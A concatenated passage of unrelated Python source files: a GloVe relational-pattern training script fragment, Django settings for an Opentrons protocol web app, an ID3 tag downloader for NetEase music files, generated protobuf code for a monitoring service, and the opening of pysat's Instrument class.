	"""Convert pattern ids into zero-padded word-id sequences with the two
	target entities spliced in: word a prepended, word b appended.

	Returns (pattern_seq, early_stop): an array of shape
	(len(p_ids), DS.max_length + 2) and the true length of each sequence.
	"""
	# pattern_seq=[[0 for j in range(DS.max_length)] for i in range(len(p_ids))]
	pattern_seq=np.zeros((len(p_ids),DS.max_length+2),dtype=int) #+2 is for the targeted two entities a and b
	early_stop=[]
	for i in range(len(p_ids)):
		pattern=DS.id2Patterns[p_ids[i]]
		words=pattern.strip().split(' ')
		words.insert(0,DS.id2word[a_ids[i]])
		words.append(DS.id2word[b_ids[i]])
		early_stop.append(len(words))
		for j,w in enumerate(words):
			pattern_seq[i,j]=DS.word2id[w]
	return pattern_seq,early_stop
# -----------------------------------------------------------
if __name__=="__main__":
	'''
	Word Embeddings
	'''
	# Load 300-d GloVe vectors (normalised, not standardised) and add the
	# special tokens used by the pattern encoder: <PAD>, X and Y placeholders.
	pretrained_glove_300=("../glove.6B.300d.zip","glove",300)
	WR=WordReps()
	norm=1
	standardise=0
	WR.Read_Embeddings_zip_file(pretrained_glove_300,norm,standardise)
	WR.vects['<PAD>']=np.zeros(WR.dim)
	WR.vects['X']=np.random.normal(size=(WR.dim)).astype('float32')
	WR.vects['Y']=np.random.normal(size=(WR.dim)).astype('float32')
	'''
	Dataset
	'''
	# DiffVec pairs for training, SemEval pairs for evaluation, plus the
	# relational pattern inventory extracted from Wikipedia.
	corpus='Wikipedia_English'
	Train_dataset=('DiffVec',"../DiffVec_Pairs")
	Test_dataset=('SemEval',"../SemEval_Pairs.txt")
	id2Patterns="../Relational_Patterns/Patterns_Xmid5Y"
	Patterns_per_pair="../Relational_Patterns/Patterns_Xmid5Y_PerPair"
	DS=DataSet(corpus,Train_dataset,Test_dataset)
	DS.Retrieve_Patterns(id2Patterns,Patterns_per_pair)
	DS.read_pairs()
	DS.Pattern_Maximum_Length()
	Ea=DS.Generate_Embedding_Matrix(WR)
	'''
	Training & Evaluation
	'''
	Eval=Training()
	Eval.Train_NLRA_Model()
|
<reponame>BU-ISCIII/opentrons_web
import os
from django.conf import settings
##### Allow to import the configuration samba files from configuration folder
import sys
sys.path.append('../')
try:
    from .url_configuration import DOMAIN_SERVER
except ImportError:
    # BUG FIX: narrowed from a bare `except:` -- only a missing
    # url_configuration module should trigger the localhost fallback;
    # genuine errors inside that module now propagate instead of being hidden.
    DOMAIN_SERVER = 'localhost'
############## FOLDER SETTINGS ###############################
## Directory settings for processing the run data files ######
## Relative path from settings.BASE_DIR
## Relative path from settings.MEDIA_ROOT
OPENROBOTS_TEMPLATE_DIRECTORY = 'templates'
OPENROBOTS_OUTPUT_DIRECTORY = 'protocol_files'
OPENROBOTS_MODULE_TYPE_GUIDES_DIRECTORY = 'user-guide'
OPENROBOTS_LABWARE_JSON_DIRECTORY = 'labware_inventory/json'
OPENROBOTS_LABWARE_PYTHON_DIRECTORY = 'labware_inventory/python'
OPENROBOTS_LABWARE_IMAGE_DIRECTORY = 'labware_inventory/image'
# Parameter names each protocol template expects, per station / protocol.
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_A_PROT_1 = ['NUM_SAMPLES' , 'BUFFER_LABWARE','DESTINATION_LABWARE', 'DEST_TUBE', 'LANGUAGE','RESET_TIPCOUNT', 'VOLUME_BUFFER', 'TIPS1000']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_A_PROT_2 = ['NUM_SAMPLES' , 'BEADS_LABWARE','PLATE_LABWARE','LANGUAGE', 'RESET_TIPCOUNT', 'DILUTE_BEADS', 'VOLUME_BEADS', 'TIPS1000']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_A_PROT_3 = ['NUM_SAMPLES' , 'LYSATE_LABWARE','PLATE_LABWARE','LANGUAGE', 'RESET_TIPCOUNT', 'VOLUME_LYSATE', 'BEADS', 'TIPS1000']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_B = ['NUM_SAMPLES', 'REAGENT_LABWARE','MAGPLATE_LABWARE', 'WASTE_LABWARE', 'ELUTION_LABWARE','LANGUAGE',
        'RESET_TIPCOUNT', 'DISPENSE_BEADS', 'REUSE_TIPS', 'TIPS1000', 'TIPS300']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_C_PROT_1 = ['NUM_SAMPLES' , 'MM_LABWARE','MMTUBE_LABWARE', 'PCR_LABWARE', 'ELUTION_LABWARE', 'LANGUAGE', 'VOLUME_ELUTION',
        'PREPARE_MASTERMIX', 'RESET_TIPCOUNT', 'TRANSFER_MASTERMIX', 'TRANSFER_SAMPLES', 'MM_TYPE', 'TIPS300']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_C_PROT_2 = ['NUM_SAMPLES' , 'MM_LABWARE', 'PCR_LABWARE', 'ELUTION_LABWARE', 'LANGUAGE', 'VOLUME_ELUTION','RESET_TIPCOUNT']
# Mapping of (template parameter name -> database field name), per station.
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_A_PROT_1 = [('NUM_SAMPLES','numberOfSamples') ,('BUFFER_LABWARE','bufferLabware'),('DESTINATION_LABWARE', 'destinationLabware'),
        ('DEST_TUBE', 'destinationTube'), ('LANGUAGE','languageCode'), ('RESET_TIPCOUNT', 'resetTipcount'), ('VOLUME_BUFFER','volumeBuffer'),('TIPS1000', 'tips1000')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_A_PROT_2 = [('NUM_SAMPLES','numberOfSamples') ,('BEADS_LABWARE','beadsLabware'),('PLATE_LABWARE', 'plateLabware'),
        ('LANGUAGE','languageCode'), ('RESET_TIPCOUNT', 'resetTipcount'), ('DILUTE_BEADS', 'diluteBeads'), ('VOLUME_BEADS', 'volumeBeads'),('TIPS1000', 'tips1000')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_A_PROT_3 = [('NUM_SAMPLES','numberOfSamples') ,('LYSATE_LABWARE','lysateLabware'),('PLATE_LABWARE', 'plateLabware'),
        ('LANGUAGE','languageCode'), ('VOLUME_LYSATE', 'volumeLysate'), ('RESET_TIPCOUNT', 'resetTipcount'), ('BEADS','beads'),('TIPS1000', 'tips1000')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_B = [('NUM_SAMPLES','numberOfSamples') ,('REAGENT_LABWARE','reagentLabware'),('MAGPLATE_LABWARE', 'magPlateLabware'),
        ('WASTE_LABWARE', 'wasteLabware'), ('LANGUAGE','languageCode'), ('ELUTION_LABWARE','elutionLabware'),('DISPENSE_BEADS', 'dispenseBeads'),
        ('RESET_TIPCOUNT', 'resetTipcount'), ('REUSE_TIPS', 'reuseTips'),('TIPS1000', 'tips1000'), ('TIPS300', 'tips300') ]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_C_PROT_1 = [('NUM_SAMPLES','numberOfSamples') , ('MM_LABWARE','masterMixLabware'),('MMTUBE_LABWARE','masterMixTubeLabware'),
        ('PCR_LABWARE','pcrPlateLabware'), ('ELUTION_LABWARE','c_elution_Labware'), ('LANGUAGE','languageCode'), ('VOLUME_ELUTION', 'volumeElution'),
        ('PREPARE_MASTERMIX','prepareMastermix'), ('RESET_TIPCOUNT', 'resetTipcount'), ('TRANSFER_MASTERMIX','transferMastermix'),
        ('TRANSFER_SAMPLES','transferSamples'), ('MM_TYPE','masterMixType'),('TIPS300', 'tips300')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_C_PROT_2 = [('NUM_SAMPLES','numberOfSamples') , ('MM_LABWARE','masterMixLabware'),
        ('PCR_LABWARE','pcrPlateLabware'), ('ELUTION_LABWARE','c_elution_Labware'), ('LANGUAGE','languageCode'), ('VOLUME_ELUTION', 'volumeElution'),
        ('RESET_TIPCOUNT', 'resetTipcount')]
# Comment tags that bracket the editable parameter section in template files.
OPENROBOTS_DELIMITATION_PARAMETERS_TAGS = ['# Parameters to adapt the protocol',
        '# End Parameters to adapt the protocol']
DOMAIN_SERVER_CONFIGURATION_FILE_HEADING = '############# DOMAIN SERVER CONFIGURATION FILE ########\n#DO NOT MODIFY MANUALLY THIS FILE\n#VALUES WILL BE MODIFIED WHEN USING THE CONFIGURATION FORM\n'
DOMAIN_SERVER_CONFIGURATION_FILE_END = '########## END DOMAIN SERVER CONFIGURATION FILE'
#PROTOCOL_NAME_MAPPING_STATION_A = [('Prot1', 'buffer'), ('Prot2', 'beads'), ('Prot3', 'lysates')]
#PROTOCOL_NAME_MAPPING_STATION_B = [('Prot1', 'extraction')]
#PROTOCOL_NAME_MAPPING_STATION_C = [('Prot1', 'pcr')]
# Validation rules for uploaded labware JSON definitions.
JSON_LABWARE_ROOT_FIELDS_TO_CHECK = ['metadata', 'dimensions','wells','parameters','brand']
JSON_LABWARE_FIELDS_TO_GET = {'brand':['brand'],'metadata':['displayName','displayCategory'],'dimensions':['xDimension',
        'yDimension', 'zDimension'],'parameters':['isMagneticModuleCompatible', 'loadName']}
JSON_LABWARE_WELL_TO_GET ={'wells':{'A1':['depth','totalLiquidVolume','shape', 'diameter','x','y','z']}}
INVALID_TEMPLATE_FILE = ['Invalid Protocol File ', 'Delimitation Parameters tags are not included in file']
INVALID_JSON_FILE = ['Invalid json File', 'File does not contains all requested information']
METADATA_FIELDS_FOR_PROTOCOL_TEMPLATE = ['protocolName', 'author', 'source','apiLevel']
PROTOCOL_STEPS_IN_TEMPLATE_FILE = ['prepare_mastermix', 'transfer_mastermix' , 'transfer_samples' ]
ADMIN_USERS = ['admin']
###### ERROR TEXT #############################################
ERROR_INVALID_FORMAT_FOR_DATES = ['Invalid date format. Use the format (DD-MM-YYYY)']
ERROR_NOT_ROBOT_ACTION_MATCHES_FOUND = ['There is not robot actions that matches your query']
ERROR_INVALID_URL = ['Invalid domain server name']
ERROR_UNABLE_TO_SAVE_CONFIGURATION_FILE = ['Unable to save the configuration file']
####### URL for Rest Api ######################################
URL_FOR_REST_API_ROBOT_USAGE = '/api/robots/createUsage'
############# NEW WEB #######################
# Parameter-definition form metadata: headings shown to the user and the
# matching model field names in the database.
PARAMETERS_TYPE = ['String', 'Boolean','Option']
PARAMETER_DEFINE_HEADING = ['Name in protocol file', 'Name in the Form', 'Type', 'Option values', 'Option Description', 'Default']
PARAMETER_DEFINE_IN_DDBB = ['parameterName', 'nameInForm', 'parameterType', 'optionValue', 'optionDescription', 'defaultValue']
STRING_TO_SEPARATE_STATION_AND_PROTOCOL_NUMBER = '-- Protocol '
|
<reponame>RainEggplant/id3_tag_downloader
# -*- coding:utf-8 -*-
import argparse
import os
import re
import urllib.request
from datetime import datetime
from mutagen.easyid3 import EasyID3
from mutagen.id3 import ID3, APIC
from PIL import Image
from ncm_api import CloudApi
def extract_file_name_id_pairs(directory):
    """Parse ``url_list.txt`` in *directory* into (file_name, song_id) pairs.

    Each useful line is expected to look like
    ``.../<file_name>?&suffix...id=<digits>``. Lines that do not match both
    patterns (e.g. a trailing blank line) are skipped instead of raising
    ``AttributeError`` as the previous ``search(...).group(0)`` chain did.

    Raises:
        FileNotFoundError: when ``url_list.txt`` does not exist.
    """
    list_path = os.path.join(directory, 'url_list.txt')
    if not os.path.exists(list_path):
        print('No "url_list.txt" under working directory! Aborted.')
        raise FileNotFoundError(list_path)
    re_file_name = re.compile(r'(?<=/)\w+\.\w+(?=\?&suffix)')
    re_id = re.compile(r'(?<=id=)\d+$')
    pairs = []
    with open(list_path, 'r') as f:
        for line in f:
            # ``$`` still matches just before a trailing newline, so the raw
            # line can be searched directly.
            name_match = re_file_name.search(line)
            id_match = re_id.search(line)
            if name_match and id_match:
                pairs.append((name_match.group(0), id_match.group(0)))
    return pairs
def download_id3_tag(file_name_id_pairs, directory):
    """For each (file_name, song_id) pair: fetch song metadata from the cloud
    API, write ID3 tags and cover art into the local audio file, rename the
    file after the song title, and log "id, new_name" lines to
    ``id3_tag_downloader.log``. Cover images downloaded during the run are
    cached and removed at the end. Files missing on disk are reported and
    skipped.
    """
    log_path = os.path.join(directory, 'id3_tag_downloader.log')
    api = CloudApi()
    img_list = []  # cover image file names downloaded during this run
    counter = 0
    length = len(file_name_id_pairs)
    # write log
    with open(log_path, 'a', encoding='utf-8') as f:
        for pair in file_name_id_pairs:
            counter += 1
            print(
                'Processing [{0:<5} / {1:<5}] {2}:'.format(counter, length, pair[0]))
            old_file_path = os.path.join(directory, pair[0])
            if (os.path.exists(old_file_path)):
                song_info = api.get_song(pair[1])
                # New base name from the song title, sanitised for the filesystem
                song_file_root = format_string(song_info['name'])
                # Keep the original extension by stripping the stem from the name
                song_file_extension = pair[0].replace(
                    os.path.splitext(pair[0])[0], '')
                f.write('%s, %s\n' %
                        (pair[1], song_file_root+song_file_extension))
                # Modify ID3 tag
                audio = EasyID3(old_file_path)
                audio['title'] = song_info['name']
                audio['artist'] = ' & '.join(
                    [artist['name'] for artist in song_info['artists']])
                audio['album'] = song_info['album']['name']
                # publishTime appears to be in milliseconds -- divided by 1000
                # before conversion to a date string.
                audio['date'] = datetime.fromtimestamp(
                    (song_info['album']['publishTime'] / 1000)).strftime('%Y-%m-%d')
                audio['tracknumber'] = str(song_info['no'])
                audio['discnumber'] = str(song_info['disc'])
                audio.save()
                # Download and resize cover
                cover_url = song_info['album']['blurPicUrl']
                if cover_url is None:
                    cover_url = song_info['album']['picUrl']
                cover_file_name = '{}.jpg'.format(
                    song_info['album']['picId'] or song_info['album']['pic'])
                cover_file_path = os.path.join(directory, cover_file_name)
                # Download each distinct cover at most once per run, and only
                # if it is not already present and non-empty on disk.
                if img_list.count(cover_file_name) == 0:
                    if (not os.path.exists(cover_file_path)) or os.path.getsize(cover_file_path) == 0:
                        urllib.request.urlretrieve(cover_url, cover_file_path)
                    img_list.append(cover_file_name)
                    resize_img(cover_file_path)
                # Add cover
                audio = ID3(old_file_path)
                with open(cover_file_path, 'rb') as cover:
                    audio['APIC'] = APIC(
                        encoding=3,
                        mime='image/jpeg',
                        type=3,
                        data=cover.read()
                    )
                audio.save()
                # Rename
                index = 1
                song_file_path = os.path.join(
                    directory, song_file_root + song_file_extension)
                # Deal with duplicate file name
                while os.path.exists(song_file_path):
                    print(' Warning! File name already exists. Renaming.')
                    index += 1
                    song_file_path = os.path.join(
                        directory, song_file_root + '_{}'.format(index) + song_file_extension)
                os.rename(old_file_path, song_file_path)
                print(' Done! New name: {}'.format(song_file_root +
                    ('' if index == 1 else'_{}'.format(index)) + song_file_extension))
            else:
                print(' Error! File not found.')
    # Clean up the cover images downloaded during this run.
    for img in img_list:
        os.remove(os.path.join(directory, img))
def resize_img(file_path, max_size=(640, 640), quality=90):
    """Shrink the image at *file_path* in place so it fits within *max_size*.

    The file is always re-saved with the given *quality*; PNG images are
    converted to RGB first so they can be written with JPEG-style quality.
    Unreadable files are reported and left untouched.
    """
    try:
        img = Image.open(file_path)
    except IOError:
        print('Can\'t open image:', file_path)
        return
    if img.size[0] > max_size[0] or img.size[1] > max_size[1]:
        # Image.LANCZOS replaces Image.ANTIALIAS, which was removed in
        # Pillow 10; both names refer to the same high-quality filter and
        # Image.LANCZOS has existed since Pillow 2.7.
        img.thumbnail(max_size, Image.LANCZOS)
    if img.format == 'PNG':
        img = img.convert('RGB')
    img.save(file_path, quality=quality)
def format_string(string):
    """Return *string* with characters illegal in file names replaced by ' '."""
    illegal_chars = re.compile(r'[\\/:*?"<>|\t]')
    return illegal_chars.sub(' ', string)
def main():
    """CLI entry point: parse the target directory, then tag every file
    listed in its ``url_list.txt``."""
    parser = argparse.ArgumentParser(
        description='''Add ID3 tags to mp3 file from netease cloud music according to music ID.
    NOTE: You will need to use it in combination with moresound.tk .''')
    parser.add_argument('-d', '--directory', dest='directory', required=True,
                        help='the directory of the audio files and "url_list.txt"')
    args = parser.parse_args()
    print('Start processing: ', end='')
    name_id_pairs = extract_file_name_id_pairs(args.directory)
    print('{0:<5} item(s) found.'.format(len(name_id_pairs)))
    download_id3_tag(name_id_pairs, args.directory)
    print('\nAll jobs finished!')
# Run only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    main()
|
<reponame>gajanlee/cat-pi-monitor
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: monitor.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database used to register the generated messages below.
_sym_db = _symbol_database.Default()
# File descriptor for monitor.proto. serialized_pb is the compiled proto
# definition emitted by protoc -- generated code, do not edit by hand.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='monitor.proto',
  package='Monitor',
  syntax='proto3',
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_pb=b'\n\rmonitor.proto\x12\x07Monitor\"#\n\x0eMonitorRequest\x12\x11\n\toperation\x18\x01 \x01(\x08\"-\n\x0bMonitorData\x12\x10\n\x08\x66ilename\x18\x01 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x02 \x01(\t\"D\n\x0eMonitorSummary\x12\x12\n\nstart_time\x18\x01 \x01(\t\x12\x10\n\x08\x65nd_time\x18\x02 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x03 \x01(\t\"2\n\x10MonitorOperation\x12\x0c\n\x04mode\x18\x01 \x01(\t\x12\x10\n\x08interval\x18\x02 \x01(\x05\x32\xb5\x02\n\x0eMonitorService\x12\x45\n\x10PutMonitorStream\x12\x14.Monitor.MonitorData\x1a\x17.Monitor.MonitorSummary\"\x00(\x01\x12G\n\x11PutMonitorSummary\x12\x17.Monitor.MonitorRequest\x1a\x17.Monitor.MonitorSummary\"\x00\x12N\n\x12GetOperationStream\x12\x17.Monitor.MonitorRequest\x1a\x19.Monitor.MonitorOperation\"\x00(\x01\x30\x01\x12\x43\n\x10GetRealtimeImage\x12\x17.Monitor.MonitorRequest\x1a\x14.Monitor.MonitorData\"\x00\x62\x06proto3'
)
# Descriptor for the MonitorRequest message: a single bool field 'operation'.
_MONITORREQUEST = _descriptor.Descriptor(
  name='MonitorRequest',
  full_name='Monitor.MonitorRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='operation', full_name='Monitor.MonitorRequest.operation', index=0,
      number=1, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=26,
  serialized_end=61,
)
# Descriptor for the MonitorData message: string fields 'filename' and 'data'.
_MONITORDATA = _descriptor.Descriptor(
  name='MonitorData',
  full_name='Monitor.MonitorData',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='filename', full_name='Monitor.MonitorData.filename', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='data', full_name='Monitor.MonitorData.data', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=63,
  serialized_end=108,
)
# Descriptor for the MonitorSummary message: string fields 'start_time',
# 'end_time' and 'data'.
_MONITORSUMMARY = _descriptor.Descriptor(
  name='MonitorSummary',
  full_name='Monitor.MonitorSummary',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='start_time', full_name='Monitor.MonitorSummary.start_time', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='end_time', full_name='Monitor.MonitorSummary.end_time', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='data', full_name='Monitor.MonitorSummary.data', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=110,
  serialized_end=178,
)
# Descriptor for the MonitorOperation message: string 'mode' and int32
# 'interval'.
_MONITOROPERATION = _descriptor.Descriptor(
  name='MonitorOperation',
  full_name='Monitor.MonitorOperation',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='mode', full_name='Monitor.MonitorOperation.mode', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='interval', full_name='Monitor.MonitorOperation.interval', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=180,
  serialized_end=230,
)
# Attach the message descriptors to the file descriptor and register it.
DESCRIPTOR.message_types_by_name['MonitorRequest'] = _MONITORREQUEST
DESCRIPTOR.message_types_by_name['MonitorData'] = _MONITORDATA
DESCRIPTOR.message_types_by_name['MonitorSummary'] = _MONITORSUMMARY
DESCRIPTOR.message_types_by_name['MonitorOperation'] = _MONITOROPERATION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Build the concrete message classes from their descriptors via reflection
# and register each with the symbol database.
MonitorRequest = _reflection.GeneratedProtocolMessageType('MonitorRequest', (_message.Message,), {
  'DESCRIPTOR' : _MONITORREQUEST,
  '__module__' : 'monitor_pb2'
  # @@protoc_insertion_point(class_scope:Monitor.MonitorRequest)
  })
_sym_db.RegisterMessage(MonitorRequest)
MonitorData = _reflection.GeneratedProtocolMessageType('MonitorData', (_message.Message,), {
  'DESCRIPTOR' : _MONITORDATA,
  '__module__' : 'monitor_pb2'
  # @@protoc_insertion_point(class_scope:Monitor.MonitorData)
  })
_sym_db.RegisterMessage(MonitorData)
MonitorSummary = _reflection.GeneratedProtocolMessageType('MonitorSummary', (_message.Message,), {
  'DESCRIPTOR' : _MONITORSUMMARY,
  '__module__' : 'monitor_pb2'
  # @@protoc_insertion_point(class_scope:Monitor.MonitorSummary)
  })
_sym_db.RegisterMessage(MonitorSummary)
MonitorOperation = _reflection.GeneratedProtocolMessageType('MonitorOperation', (_message.Message,), {
  'DESCRIPTOR' : _MONITOROPERATION,
  '__module__' : 'monitor_pb2'
  # @@protoc_insertion_point(class_scope:Monitor.MonitorOperation)
  })
_sym_db.RegisterMessage(MonitorOperation)
# Service descriptor for MonitorService and its four RPC methods
# (two of which use streaming, per the serialized proto definition).
_MONITORSERVICE = _descriptor.ServiceDescriptor(
  name='MonitorService',
  full_name='Monitor.MonitorService',
  file=DESCRIPTOR,
  index=0,
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_start=233,
  serialized_end=542,
  methods=[
  _descriptor.MethodDescriptor(
    name='PutMonitorStream',
    full_name='Monitor.MonitorService.PutMonitorStream',
    index=0,
    containing_service=None,
    input_type=_MONITORDATA,
    output_type=_MONITORSUMMARY,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='PutMonitorSummary',
    full_name='Monitor.MonitorService.PutMonitorSummary',
    index=1,
    containing_service=None,
    input_type=_MONITORREQUEST,
    output_type=_MONITORSUMMARY,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='GetOperationStream',
    full_name='Monitor.MonitorService.GetOperationStream',
    index=2,
    containing_service=None,
    input_type=_MONITORREQUEST,
    output_type=_MONITOROPERATION,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='GetRealtimeImage',
    full_name='Monitor.MonitorService.GetRealtimeImage',
    index=3,
    containing_service=None,
    input_type=_MONITORREQUEST,
    output_type=_MONITORDATA,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
])
_sym_db.RegisterServiceDescriptor(_MONITORSERVICE)
DESCRIPTOR.services_by_name['MonitorService'] = _MONITORSERVICE
# @@protoc_insertion_point(module_scope)
|
#!/usr/bin/env python
# Full license can be found in License.md
# Full author list can be found in .zenodo.json file
# DOI:10.5281/zenodo.1199703
# ----------------------------------------------------------------------------
import copy
import datetime as dt
import errno
import functools
import importlib
import inspect
import os
import sys
import types
import warnings
import weakref
import netCDF4
import numpy as np
import pandas as pds
import xarray as xr
import pysat
from pysat import utils
from pysat import logger
class Instrument(object):
"""Download, load, manage, modify and analyze science data.
Parameters
----------
platform : string
name of instrument platform (default='')
name : string
name of instrument (default='')
tag : string
identifies particular subset of instrument data
(default='')
inst_id : string
Secondary level of identification, such as spacecraft within a
constellation platform (default='')
clean_level : str or NoneType
Level of data quality. If not provided, will default to the
setting in `pysat.params['clean_level']` (default=None)
pad : pandas.DateOffset, dictionary, or NoneType
Length of time to pad the begining and end of loaded data for
time-series processing. Extra data is removed after applying all
custom functions. Dictionary, if supplied, is simply passed to
pandas DateOffset. (default=None)
orbit_info : dict
Orbit information, {'index': index, 'kind': kind, 'period': period}.
See pysat.Orbits for more information. (default={})
inst_module : module or NoneType
Provide instrument module directly, takes precedence over platform/name
(default=None)
update_files : boolean or Nonetype
If True, immediately query filesystem for instrument files and store.
If False, the local files are presumed to be the same. By default,
this setting will be obtained from `pysat.params` (default=None)
temporary_file_list : boolean
If true, the list of Instrument files will not be written to disk.
Prevents a race condition when running multiple pysat processes.
(default=False)
strict_time_flag : boolean
If true, pysat will check data to ensure times are unique and
monotonically increasing. (default=True)
directory_format : string, function, or NoneType
Directory naming structure in string format. Variables such as platform,
name, and tag will be filled in as needed using python string
formatting. The default directory structure, which is used if None is
specified, is '{platform}/{name}/{tag}'. If a function is provided, it
must take `tag` and `inst_id` as arguments and return an appropriate
string. (default=None)
file_format : str or NoneType
File naming structure in string format. Variables such as year,
month, and inst_id will be filled in as needed using python string
formatting. The default file format structure is supplied in the
instrument list_files routine. (default=None)
ignore_empty_files : boolean
if True, the list of files found will be checked to
ensure the filesizes are greater than zero. Empty files are
removed from the stored list of files. (default=False)
labels : dict
Dict where keys are the label attribute names and the values are tuples
that have the label values and value types in that order.
(default={'units': ('units', str), 'name': ('long_name', str),
'notes': ('notes', str), 'desc': ('desc', str),
'min_val': ('value_min', float),
'max_val': ('value_max', float), 'fill_val': ('fill', float)})
Attributes
----------
bounds : (datetime/filename/None, datetime/filename/None)
bounds for loading data, supply array_like for a season with gaps.
Users may provide as a tuple or tuple of lists, but the attribute is
stored as a tuple of lists for consistency
custom_functions : list
List of functions to be applied by instrument nano-kernel
custom_args : list
List of lists containing arguments to be passed to particular
custom function
custom_kwargs : list
List of dictionaries with keywords and values to be passed
to a custom function
data : pandas.DataFrame or xarray.Dataset
loaded science data
date : dt.datetime
date for loaded data
yr : int
year for loaded data
doy : int
day of year for loaded data
files : pysat.Files
interface to instrument files
kwargs : dictionary
keyword arguments passed to the standard Instrument routines
meta_labels : dict
Dict containing defaults for new Meta data labels
meta : pysat.Meta
interface to instrument metadata, similar to netCDF 1.6
orbits : pysat.Orbits
interface to extracting data orbit-by-orbit
Note
----
pysat attempts to load the module platform_name.py located in the
pysat/instruments directory. This module provides the underlying
functionality to download, load, and clean instrument data. Alternatively,
the module may be supplied directly using keyword inst_module.
Examples
--------
::
# 1-second mag field data
vefi = pysat.Instrument(platform='cnofs',
name='vefi',
tag='dc_b',
clean_level='clean')
start = dt.datetime(2009,1,1)
stop = dt.datetime(2009,1,2)
vefi.download(start, stop)
vefi.load(date=start)
print(vefi['dB_mer'])
print(vefi.meta['db_mer'])
# 1-second thermal plasma parameters
ivm = pysat.Instrument(platform='cnofs',
name='ivm',
tag='',
clean_level='clean')
ivm.download(start,stop)
ivm.load(2009,1)
print(ivm['ionVelmeridional'])
# Ionosphere profiles from GPS occultation. Enable binning profile
# data using a constant step-size. Feature provided by the underlying
# COSMIC support code.
cosmic = pysat.Instrument('cosmic',
'gps',
